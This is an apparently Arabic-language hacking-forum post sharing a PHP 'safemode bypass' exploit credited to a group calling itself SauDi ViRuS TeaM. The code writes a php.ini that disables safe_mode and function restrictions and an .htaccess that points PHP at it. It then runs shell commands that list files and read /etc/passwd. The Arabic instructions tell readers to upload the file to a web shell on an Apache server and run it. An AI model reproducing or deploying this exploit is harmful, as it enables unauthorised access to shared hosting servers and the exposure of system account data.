كود PHP:
<?
/*
apache SetEnv module safemode bypass exploit
SauDi ViRuS TeaM
WwW.Sa-ViRuS.CoM
*/
echo "[+] Start...n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[~] evil files created succes ! n";
}
else{
echo "[-] access denial ! n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$anti=fwrite($bypfile,$byprullz1);
$as1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($anti and $as1!= NULL){
echo "[~] php.ini writed n";
}
else{
echo "[-] 404 php.ini not found !n";
}
$breakrullz="SetEnv PHPRC /home/svt/public_html/php.ini"; // replace this
'/home/svt/public_html' by your path
$r3no=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($r3no!= NULL){
echo "[~] evil .htaccess writedn";
echo "[~] exploited by success!nnn";
echo "ttt[+] discouvred by AnTi SeCuRe - RENO n";
echo "ttt[+] home : www.sa-virus.comn";
echo "ttt[+] Greetz : Mr.SaFa7 , Dr.Saudi , MiND n";
}
else{
echo "[-] evil .htaccess Not found!n";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
?>
المصدر
http://securityreason.com/exploit*****/9012
احفظ الثغره بملف php
ارفعه ع الشيل وشغلو
هاد في حال السيرفر اباتشي والسيف مود اون
مش كل السيرفرات اباتشي smilies11
موفقين
priv8- SetEnv module safemode bypass exploit